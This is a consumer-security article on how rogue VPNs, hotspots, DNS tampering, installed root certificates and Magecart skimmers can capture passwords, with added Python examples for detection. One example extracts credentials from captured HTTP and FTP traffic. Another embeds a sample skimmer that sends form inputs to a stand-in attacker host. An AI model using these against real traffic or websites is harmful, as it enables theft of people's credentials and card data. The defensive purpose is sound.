It’s always a worry that a VPN might be stealing passwords, and it was on my mind when I was choosing a VPN: I looked at the security offered and the integrity of the provider, since every password I typed would pass through the VPN.
Can a VPN steal passwords? As a general rule, a VPN can read passwords only when a connection is made to a website over plain HTTP rather than HTTPS, because the VPN server sees that traffic in clear text. Over HTTPS the VPN still sees which site you are talking to (the server’s IP address and, unless Encrypted Client Hello is in use, its name in the TLS handshake), but not the page contents or the credentials inside them. The other route is malware: some VPN clients install keyloggers or browser scripts that capture passwords as they are typed, and those work regardless of how the website is reached.
An insecure connection is one where the website address starts with http, for example http://www.bbc.com. It means the connection is not encrypted, and anything sent over it can be read by whoever intercepts it, whether an attacker on the network or a rogue VPN.
When the address starts with https, for example https://www.bbc.com, the connection is encrypted with TLS. Captured traffic is useless to an attacker without the session keys, which are negotiated between the browser and the website and never travel over the network in the clear.
On a public Wi-Fi hotspot controlled by an attacker, all traffic passing through it can be captured. HTTP traffic is readable as it is; HTTPS traffic yields only ciphertext, plus metadata such as destination addresses and server names.
Always make sure that any website where you enter information worth protecting, from personal details and credit card numbers to medical records, is reached over HTTPS, so that the information travels to the website inside an encrypted channel.
A VPN adds a layer of protection because the connection to it is encrypted, but that encryption only extends as far as the VPN server. Traffic leaving the VPN server for the website is whatever you sent: HTTPS stays encrypted, HTTP is exposed. So HTTPS still matters when you use a VPN.
The following tips are a must to protect your passwords online when using VPNs:
- Watch out for sneaky FREE VPNs
- Plug-in VPNs can sniff your password
- Untrusted connections across VPNs can be sniffed
- Avoid FAKE password-stealing public wifi hotspots
- Avoid VPNs with FAKE DNS
- Avoid self-signing certificate tricks from rogue VPNs
- Watch out for Magecart infections
Rogue VPNs that are malicious will try to trick people into giving them their passwords using sneaky techniques but you can take the following steps to protect yourself.
Here are the seven steps in detail that you can take to make sure your passwords are kept safe from a VPN.
1. Watch out for sneaky FREE VPNs
As the old saying ‘beware of Greeks bearing gifts’ warns, something that looks like a gift can be a trap for the unsuspecting. When something is FREE, there is often a catch.
Some FREE VPNs are built for one purpose only: to steal information, in particular login credentials for banking, email and popular social media sites.
Most VPN clients need elevated privileges to install, because they add a virtual network adapter and change routing and DNS settings. Those privileges give the installer the same access an administrator has, and a malicious provider can use them to install far more than a VPN.
On Microsoft Windows in particular, an installer running as administrator can drop not just the VPN software but also unwanted extras, from potentially unwanted programs (PUPs) or potentially unwanted applications (PUAs) to outright malware and keyloggers.
Can a VPN see my passwords? Only if the website is reached over HTTP, since that traffic is not encrypted. Over HTTPS the VPN server sees only ciphertext and cannot recover passwords from it, with one important exception: a VPN client that has installed its own root certificate on your device (see step 6) can decrypt HTTPS traffic by sitting in the middle of it.
Harvesting passwords with malware is becoming more common, as attackers find it harder to break into encrypted VPN connections and encrypted connections to websites. Malware gives them an easier way to capture passwords and other sensitive information before it is ever encrypted.
Use a reputable VPN
Using a reputable VPN provider minimises the likelihood of passwords being stolen. These providers depend on their reputation and have every incentive to make sure their customers’ data, credentials included, is not intercepted.
Reputable VPNs offer modern, well-reviewed protocols, as not all VPN encryption is equal. The obsolete PPTP protocol, for example, authenticates with MS-CHAPv2, which has been practically breakable for years; look for WireGuard, OpenVPN or IKEv2/IPsec with current cipher suites.
How can the average VPN user be sure their VPN is encrypting their communications at all? Without technical skills it is difficult to check. One practical test is to run a packet capture tool such as Wireshark on the physical network interface while the VPN is connected: you should see only the tunnel protocol (for example WireGuard or OpenVPN packets) and no readable HTTP or DNS. A reputable VPN gives confidence that everything is encrypted; a fake VPN might use a weak algorithm or not bother to encrypt at all.
2. Plug-in VPNs can sniff your password
Many VPN providers offer browser extensions for popular browsers such as Google’s Chrome and Mozilla’s Firefox. Once installed, these extensions route the browser’s traffic through the provider’s servers. Strictly speaking, most are proxies rather than VPNs: they use the browser’s proxy API and protect only what the browser sends.
Using the full VPN client instead of a browser extension means all of the device’s internet traffic, not just the browser’s, travels through the encrypted VPN tunnel.
If the VPN extension is hijacked (or was malicious from the start), it can redirect or rewrite the pages the browser loads. It is then easy for attackers to serve look-alike pages, so that people believe they are entering their banking credentials into their bank’s website when they are in fact entering them into a fake one.
This type of phishing attack is at times sophisticated enough to fool even security-conscious individuals.
It is also important to note that with a VPN extension, not all the internet traffic from the user’s device goes across the VPN; only traffic initiated by that web browser does.
Banking apps, social media apps and anything else that does not run inside the browser bypass the extension entirely. Those native applications are as exposed as they would be without a VPN, more so if they do not use encrypted connections.
3. Untrusted connections across VPNs can be sniffed
It is vitally important to connect to websites securely, because a VPN can take advantage of people who connect over insecure connections, which makes stealing passwords easy.
Connecting to a website over HTTP instead of the more secure HTTPS means any passwords or confidential information entered into its forms is transmitted in the clear, where it can be read at any point along the path across the internet.
A VPN operator can run a network sniffing tool on its servers and quite easily capture those unencrypted passwords, then use them to log into banking, email and social media accounts.
A weak channel is nearly as bad. If the HTTPS connection negotiates an obsolete protocol version (SSLv3, TLS 1.0 or 1.1) or a broken cipher such as RC4 or an export-grade suite, an attacker on the path can break it and recover the data, passwords included.
To make sure the VPN can’t steal passwords, use secure connections to websites with a good level of encryption between the web browser and the website. The padlock icon in the browser’s address bar shows the connection is encrypted; clicking it shows which certificate and protocol version are in use.
Use HTTPS connections only
The connection from your device to the VPN service is encrypted inside the VPN tunnel, but once traffic passes through the VPN server it leaves the tunnel. It then travels out of the VPN server across the internet to its intended destination like any other traffic.
If you’ve connected to a website over HTTP instead of HTTPS, the information is only protected from prying eyes while it is in the VPN tunnel (assuming the VPN itself can be trusted). Once it leaves the VPN server for the website, it is no longer encrypted and can be intercepted, and any passwords in it captured.
Make sure all connections to websites use HTTPS, so the encryption runs end-to-end between the web browser and the website. Neither the VPN provider nor any network the traffic crosses after leaving the VPN server can read the contents of an HTTPS connection. Modern browsers offer an HTTPS-only mode that refuses plain HTTP connections unless you explicitly allow them; turning it on removes the need to check the address bar each time.
Use Secure FTP
If you upload or download files using plain FTP, your username and password are sent in clear text on the control channel, where the VPN or anyone else on the path can read them. Use FTP over TLS (explicit FTPS, where the client issues AUTH TLS before logging in) or SFTP, which runs over SSH, so that the credentials travel over an encrypted connection. Configure the client to refuse to fall back to plain FTP if the TLS upgrade fails.
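What a passive observer at the VPN exit actually recovers from HTTP, FTP and HTTPS traffic, as an added example in Python that is not part of the original article. It illustrates both the HTTP-versus-HTTPS discussion at the top of the page and step 3 (HTTPS and FTP over TLS). The captured payloads, the example.com hostnames and the credentials are all constructed; the parsing logic works on real TCP payloads lifted from a packet capture.

```python
"""Added example: what a passive observer (a rogue VPN server, a hotspot owner or
anyone on the path after the VPN exit) recovers from captured traffic.
Not code from the original page; the captured payloads below are constructed."""
import re
from urllib.parse import parse_qs

# Constructed sample captures (what a packet capture on the VPN exit might contain).
HTTP_LOGIN_POST = (
    b"POST /login HTTP/1.1\r\n"
    b"Host: www.example.com\r\n"
    b"Content-Type: application/x-www-form-urlencoded\r\n"
    b"Content-Length: 39\r\n"
    b"\r\n"
    b"username=alice&password=Hunter2%21&go=1"
)
FTP_SESSION = (
    b"220 ftp.example.com FTP server ready\r\n"
    b"USER alice\r\n"
    b"331 Password required for alice\r\n"
    b"PASS Hunter2!\r\n"
    b"230 User alice logged in\r\n"
)
# A TLS 1.2 application-data record: type 0x17, version 0x0303, length 0x20, then ciphertext.
TLS_RECORD = b"\x17\x03\x03\x00\x20" + bytes(range(0x20))

CRED_KEYS = ("password", "passwd", "pass", "pwd", "user", "username", "login", "email")


def extract_http_credentials(payload: bytes) -> dict:
    """Parse a plaintext HTTP request and return form fields that look like credentials."""
    head, sep, body = payload.partition(b"\r\n\r\n")
    if not sep:
        return {}
    request_line = head.split(b"\r\n", 1)[0]
    if not re.match(rb"^(POST|PUT|GET) \S+ HTTP/1\.[01]$", request_line):
        return {}
    fields = parse_qs(body.decode("utf-8", "replace"))
    return {k: v[0] for k, v in fields.items() if k.lower() in CRED_KEYS}


def extract_ftp_credentials(payload: bytes) -> dict:
    """FTP sends USER and PASS as plain commands on the control channel."""
    creds = {}
    for line in payload.decode("utf-8", "replace").splitlines():
        m = re.match(r"^(USER|PASS) (.+)$", line)
        if m:
            creds[m.group(1).lower()] = m.group(2)
    return creds


def classify(payload: bytes) -> str:
    """Tell plaintext protocols apart from TLS records by their first bytes."""
    if len(payload) >= 3 and payload[0] in (0x14, 0x15, 0x16, 0x17) and payload[1] == 0x03:
        return "tls"
    if re.match(rb"^(GET|POST|PUT|HEAD) ", payload):
        return "http"
    if re.match(rb"^(\d{3}[ -]|USER |PASS )", payload):
        return "ftp"
    return "unknown"


def sniff(payload: bytes) -> dict:
    """What the observer learns from one captured payload."""
    kind = classify(payload)
    if kind == "http":
        return {"protocol": kind, "credentials": extract_http_credentials(payload)}
    if kind == "ftp":
        return {"protocol": kind, "credentials": extract_ftp_credentials(payload)}
    # TLS: the observer sees record type, version and length, never the plaintext.
    return {"protocol": kind, "credentials": {}}


if __name__ == "__main__":
    for sample in (HTTP_LOGIN_POST, FTP_SESSION, TLS_RECORD):
        print(sniff(sample))
```

The HTTP and FTP samples give up the username and password in full; the TLS record gives up only its framing. That framing (plus the destination address and the server name in the handshake) is still metadata the VPN can log, which is the caveat to keep in mind even when everything is HTTPS.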
4. Avoid FAKE password-stealing public wifi hotspots
Be wary of dodgy WiFi hotspots: attackers can set them up easily and trick users into connecting. Once connected, users can be served a fake sign-in page that prompts them to download software, which is in fact malware.
That malware can include keylogging functionality that captures whatever is typed into website forms, such as a bank login. So even when a VPN is in use, malware picked up from the hotspot is actively stealing passwords on the device itself, before the VPN ever sees the traffic.
Setting up a WiFi hotspot is straightforward. Someone having a coffee in Starbucks might see a hotspot called Starbucks_Coffee_WiFi, which does not necessarily mean it is genuine.
The real hotspot might be called just Starbucks, while an attacker sets up a phone or other device with a hotspot of a similar name, perhaps with an underscore (“_”) appended.
Most people will see the look-alike name, assume it is authentic and connect to it, especially if it appears above the real one in the list.
Attackers also place their hotspot close to the intended victims so that it gives out a stronger signal and rises to the top of the available networks, since most phones and laptops prioritise WiFi networks by signal strength. Devices that automatically reconnect to a remembered network name will join the impostor without asking.
Connections over public WiFi can also be attacked with a technique called SSL stripping, where the attacker sits in the middle of the connection (a Man in the Middle attack) and quietly downgrades the user to the insecure HTTP version of a website, so that the password is entered on a page the attacker can read. Websites that send an HSTS header, and browsers in HTTPS-only mode, refuse the downgrade.
Find out more, on whether it is safe to use public Wi-Fi with a VPN, where I discuss this in more detail.
5. Avoid VPNs with FAKE DNS
Some VPN clients change how traffic to the internet is routed, including pointing the device at the provider’s own DNS service. DNS translates a website name into an IP address (a four-octet number for IPv4, or a longer IPv6 address), and it is that address the connection is actually made to.
If the DNS service returns a different address for the website name, the person typing the name into their browser would be none the wiser that they are connecting to a different site. As long as it looks like where they intended to go, it seems fine, even if the site is a phishing page built to grab their credentials. With HTTPS, the fake site also needs a certificate the browser accepts for that name, which is why DNS tampering is usually paired with a malicious root certificate (step 6) or an HTTP downgrade.
It is imperative that the DNS services used by the VPN are honest (not poisoning answers) and route traffic to the correct destinations. A reputable VPN uses reputable DNS resolvers, and you can check by comparing the answers you get through the VPN with those from a trusted resolver over DNS-over-HTTPS.
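One way to check for a resolver that hands out the wrong address, as an added example in Python that is not from the original article: parse the raw DNS reply received through the VPN and compare its A records with a reply for the same name obtained out of band (for example from a trusted DNS-over-HTTPS resolver). The name bank.example, the addresses (from the 192.0.2.0/24 and 198.51.100.0/24 documentation ranges) and the reply packets are all constructed; the parser handles real responses, including compressed names.

```python
"""Added example (not from the original page): detect a resolver that answers with
the wrong address by parsing the raw DNS reply and comparing it with an answer
obtained out of band. Packets and addresses below are constructed."""
import struct


def encode_name(name: str) -> bytes:
    """Wire-format a DNS name: length-prefixed labels ending in a zero byte."""
    labels = name.rstrip(".").split(".")
    return b"".join(bytes([len(l)]) + l.encode() for l in labels) + b"\x00"


def build_a_response(txid: int, name: str, ips: list, ttl: int = 300) -> bytes:
    """Build a minimal DNS response carrying one A record per IP (used to construct samples)."""
    header = struct.pack(">HHHHHH", txid, 0x8180, 1, len(ips), 0, 0)
    question = encode_name(name) + struct.pack(">HH", 1, 1)  # QTYPE A, QCLASS IN
    answers = b""
    for ip in ips:
        rdata = bytes(int(o) for o in ip.split("."))
        # 0xC00C is a compression pointer back to the name at offset 12 (the question).
        answers += b"\xc0\x0c" + struct.pack(">HHIH", 1, 1, ttl, 4) + rdata
    return header + question + answers


def read_name(packet: bytes, offset: int):
    """Decode a possibly compressed name; return (name, offset just after it)."""
    labels, jumped, end = [], False, offset
    while True:
        length = packet[offset]
        if length & 0xC0 == 0xC0:  # compression pointer to an earlier name
            if not jumped:
                end = offset + 2
            offset = struct.unpack(">H", packet[offset:offset + 2])[0] & 0x3FFF
            jumped = True
            continue
        offset += 1
        if length == 0:
            if not jumped:
                end = offset
            break
        labels.append(packet[offset:offset + length].decode())
        offset += length
    return ".".join(labels), end


def parse_a_records(packet: bytes) -> dict:
    """Return {name: [ipv4, ...]} for the A records in the answer section."""
    _txid, _flags, qdcount, ancount, _ns, _ar = struct.unpack(">HHHHHH", packet[:12])
    offset = 12
    for _ in range(qdcount):
        _, offset = read_name(packet, offset)
        offset += 4  # QTYPE + QCLASS
    result = {}
    for _ in range(ancount):
        name, offset = read_name(packet, offset)
        rtype, rclass, _ttl, rdlen = struct.unpack(">HHIH", packet[offset:offset + 10])
        offset += 10
        rdata = packet[offset:offset + rdlen]
        offset += rdlen
        if rtype == 1 and rclass == 1 and rdlen == 4:
            result.setdefault(name, []).append(".".join(str(b) for b in rdata))
    return result


def resolver_disagrees(vpn_reply: bytes, trusted_reply: bytes) -> dict:
    """Names whose A records from the VPN's resolver share no address with the trusted answer."""
    vpn, trusted = parse_a_records(vpn_reply), parse_a_records(trusted_reply)
    return {n: vpn[n] for n in vpn if n in trusted and not set(vpn[n]) & set(trusted[n])}


# Constructed replies for the same query: a trusted resolver, a spoofing one and an honest one.
TRUSTED = build_a_response(0x1234, "bank.example", ["192.0.2.10", "192.0.2.11"])
SPOOFED = build_a_response(0x1234, "bank.example", ["198.51.100.7"])
HONEST = build_a_response(0x1234, "bank.example", ["192.0.2.11"])

if __name__ == "__main__":
    print("spoofed resolver:", resolver_disagrees(SPOOFED, TRUSTED))
    print("honest resolver: ", resolver_disagrees(HONEST, TRUSTED))
```

A disagreement is a signal to investigate rather than proof of tampering: content delivery networks legitimately return different addresses depending on the resolver’s location, which is why the check looks for no overlap at all rather than an exact match.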
6. Avoid self-signing certificate tricks from rogue VPNs
A VPN installer may add its own self-signed root certificate to the user’s computer as part of the installation. That allows the VPN software to intercept any encrypted traffic sent from the user’s computer to any website the user visits.
Even when the website is reached over encrypted HTTPS, the VPN can then read the contents of the communication.
The assumption that an HTTPS connection is encrypted end-to-end is then only true up to a point: the VPN client sits in the middle of the connection as a Man in the Middle (MitM), terminating the browser’s TLS session, reading passwords and any other data, and opening its own TLS session onward to the real website.
The VPN uses the root certificate it installed to falsely represent itself as a trusted party in the certificate chain, in essence becoming a root Certificate Authority (CA) for that device.
That lets it decide which encrypted connections the device will trust and, more worryingly, generate its own certificates on the fly for banks, email services (e.g. Gmail, Hotmail), Facebook or virtually any website.
The user’s web browser will not flag the certificate as fake, because to all intents and purposes it was signed by a trusted party: the root certificate the VPN installed. Certificate Transparency does not help here either, since browsers do not require CT logs for certificates chaining to a locally installed root.
When the user goes to their bank’s website, the VPN watches for data sent from the log-on pages and, as the Man in the Middle, captures it with ease.
Choosing a reputable VPN provider minimises the risk of being duped into installing a root certificate that hands the provider open access. You can also check for yourself: click the padlock in the browser and look at who issued the website’s certificate. If the issuer is the VPN vendor rather than a public CA, the connection is being intercepted. Apps that pin their own certificates, as many banking apps do, will simply fail to connect through such a VPN.
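A practical way to catch an interception root, as an added example in Python that is not part of the original article: take a snapshot of the roots your TLS client trusts before installing a VPN client, take another afterwards, and diff them. The sample entries below are constructed in the same shape as ssl.SSLContext.get_ca_certs() returns, and the vendor name FreeVPN is hypothetical.

```python
"""Added example (not from the original page): snapshot the root certificates your
TLS client trusts, then diff a later snapshot to spot a root that a VPN installer
slipped in. Standard library only; the sample entries are constructed."""
import ssl
from datetime import datetime, timezone


def root_key(info: dict) -> tuple:
    """Identify a root by its subject DN and serial number (the shape get_ca_certs() returns)."""
    subject = tuple(sorted(rdn[0] for rdn in info["subject"]))
    return (subject, info.get("serialNumber", ""))


def snapshot_roots(ctx: ssl.SSLContext = None) -> dict:
    """Map each trusted root to its info dict. On Linux with a capath-only store this may
    be empty because OpenSSL loads roots lazily; on Windows and macOS the system store is
    enumerated, which is where a VPN installer would put its root."""
    ctx = ctx or ssl.create_default_context()
    return {root_key(c): c for c in ctx.get_ca_certs()}


def new_roots(baseline: dict, current: dict, installed_after: datetime = None) -> list:
    """Roots present now but not in the baseline. If installed_after is given, also flag
    roots whose notBefore is later than that moment: an interception CA is typically
    generated on the machine at install time, so it is 'born' when the VPN client was."""
    suspicious = []
    for key, info in current.items():
        recent = False
        if installed_after is not None:
            issued = datetime.fromtimestamp(ssl.cert_time_to_seconds(info["notBefore"]), timezone.utc)
            recent = issued > installed_after
        if key not in baseline or recent:
            suspicious.append(info)
    return suspicious


def describe(info: dict) -> str:
    """One-line summary of a root for a report."""
    name = dict(rdn[0] for rdn in info["subject"]).get("commonName", "?")
    return f"{name} (serial {info.get('serialNumber', '?')}, valid from {info['notBefore']})"


# Constructed entries: a long-standing public root and a root dropped in by a (hypothetical) VPN.
PUBLIC_ROOT = {
    "subject": ((("countryName", "XX"),), (("organizationName", "Example Trust"),),
                (("commonName", "Example Trust Root CA"),)),
    "issuer": ((("countryName", "XX"),), (("organizationName", "Example Trust"),),
               (("commonName", "Example Trust Root CA"),)),
    "version": 3, "serialNumber": "01",
    "notBefore": "Jan  1 00:00:00 2015 GMT", "notAfter": "Jan  1 00:00:00 2035 GMT",
}
VPN_ROOT = {
    "subject": ((("organizationName", "FreeVPN Ltd"),), (("commonName", "FreeVPN Secure Root"),)),
    "issuer": ((("organizationName", "FreeVPN Ltd"),), (("commonName", "FreeVPN Secure Root"),)),
    "version": 3, "serialNumber": "7A3F",
    "notBefore": "Mar 14 09:12:33 2024 GMT", "notAfter": "Mar 12 09:12:33 2034 GMT",
}
BASELINE = {root_key(PUBLIC_ROOT): PUBLIC_ROOT}                         # before the VPN install
AFTER_INSTALL = {root_key(PUBLIC_ROOT): PUBLIC_ROOT, root_key(VPN_ROOT): VPN_ROOT}
INSTALL_TIME = datetime(2024, 1, 1, tzinfo=timezone.utc)               # constructed baseline time

if __name__ == "__main__":
    for root in new_roots(BASELINE, AFTER_INSTALL, INSTALL_TIME):
        print("suspicious root:", describe(root))
    print("roots trusted by this machine's default context:", len(snapshot_roots()))
```

Run snapshot_roots() before installing the VPN client, save the result, and run new_roots() against a fresh snapshot afterwards. Anything it reports whose issuer is the VPN vendor rather than a public CA is the interception root described above.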
7. Watch out for Magecart infections
Even with a VPN, if you visit a website infected with Magecart, sensitive information such as credit card details and passwords can be stolen. The skimming script runs inside your browser, within the HTTPS session, so neither a VPN nor HTTPS protects against it.
Magecart infections tamper with the scripts a website uses, injecting malicious code into them. When information is entered into an infected website, the malicious script reads what was typed into the forms, such as passwords and card numbers, and sends it to the attackers’ server.
This form of skimming has affected some big-name websites, including British Airways and Ticketmaster. Bloomberg reckoned in October 2019 that there had been over 2 million infections, and the number has kept growing since.
Magecart also infects the third-party providers whose scripts websites embed. Once a third-party script is compromised, the infection spreads at once to every website that loads it.
How can you avoid Magecart-infected websites? An article on the Trustwave website goes through a number of steps you can take to check whether a website is infected.
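A check for the script-injection pattern Magecart relies on, as an added example in Python that is not part of the original article or of the Trustwave steps it refers to. It lists every script on a page, flags third-party scripts loaded without a Subresource Integrity (SRI) hash (which is what lets a compromised third-party host swap in a skimmer), and flags inline scripts that read form fields and send data to a host other than the page’s own. The page HTML, the skimmer and all the domain names are constructed.

```python
"""Added example (not from the original page): audit the scripts on a checkout page for the
injection pattern Magecart uses. Constructed HTML and domains; run it on a saved page."""
import re
from html.parser import HTMLParser
from urllib.parse import urlparse


class ScriptCollector(HTMLParser):
    """Collect every <script> tag: its src, integrity attribute and inline code."""

    def __init__(self):
        super().__init__()
        self.scripts = []
        self._current = None

    def handle_starttag(self, tag, attrs):
        if tag == "script":
            a = dict(attrs)
            self._current = {"src": a.get("src"), "integrity": a.get("integrity"), "code": ""}

    def handle_data(self, data):
        if self._current is not None:
            self._current["code"] += data

    def handle_endtag(self, tag):
        if tag == "script" and self._current is not None:
            self.scripts.append(self._current)
            self._current = None


# Ways skimmers typically ship stolen fields off the page, and ways they read them.
EXFIL_PATTERNS = (r"\bnew\s+Image\(\)\.src\s*=", r"\bsendBeacon\(", r"\bfetch\(", r"XMLHttpRequest")
FORM_READ = r"\b(document\.forms|querySelector(?:All)?\(\s*['\"](?:input|form)|\.value\b)"


def audit_scripts(page_url: str, html: str) -> dict:
    """Return third-party scripts without SRI and inline scripts that read forms and exfiltrate."""
    page_host = urlparse(page_url).hostname
    collector = ScriptCollector()
    collector.feed(html)
    findings = {"third_party_without_sri": [], "suspicious_inline": []}
    for s in collector.scripts:
        if s["src"]:
            host = urlparse(s["src"]).hostname
            if host and host != page_host and not s["integrity"]:
                findings["third_party_without_sri"].append(s["src"])
        else:
            code = s["code"]
            reads_forms = re.search(FORM_READ, code) is not None
            hosts = {urlparse(u).hostname for u in re.findall(r"https?://[^\s'\"]+", code)}
            hosts.discard(page_host)
            if reads_forms and hosts and any(re.search(p, code) for p in EXFIL_PATTERNS):
                findings["suspicious_inline"].append(sorted(hosts))
    return findings


# Constructed checkout page: one pinned CDN script, one unpinned tracker, one first-party
# script and an injected inline skimmer that posts every input field to an attacker host.
SAMPLE_PAGE = """<html><head>
<script src="https://cdn.example-cdn.net/checkout.js" integrity="sha384-constructedplaceholderhash" crossorigin="anonymous"></script>
<script src="https://analytics.example-tracker.com/tag.js"></script>
<script src="/static/app.js"></script>
</head><body>
<form id="pay"><input name="card"><input name="password" type="password"></form>
<script>
document.forms[0].addEventListener("submit", function () {
  var d = {};
  document.querySelectorAll("input").forEach(function (i) { d[i.name] = i.value; });
  new Image().src = "https://collect.example-attacker.net/p?" + btoa(JSON.stringify(d));
});
</script>
</body></html>"""

if __name__ == "__main__":
    print(audit_scripts("https://shop.example.com/checkout", SAMPLE_PAGE))
```

The check is deliberately narrow: it cannot see a skimmer that was injected into the site’s own first-party bundle on the server, and a pinned SRI hash only helps for scripts the site owner chose to pin. It is a quick triage aid for a page you already suspect, not a replacement for the site owner fixing their supply chain.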
It is highly advisable to choose a reputable VPN to make sure your personal information, passwords included, is kept safe. If you are unsure which VPN to choose, please read my article on how to get a VPN, where I look at the 10 best ways to get one.
Is a VPN safe for online banking? Yes, but only a reputable VPN that does not install keylogging or snooping software, or its own root certificate, to steal passwords.
Can you be tracked if you use a VPN? Yes. You can be tracked if the VPN keeps logs, leaks DNS queries outside the tunnel, or does not mask your internet protocol (IP) address effectively.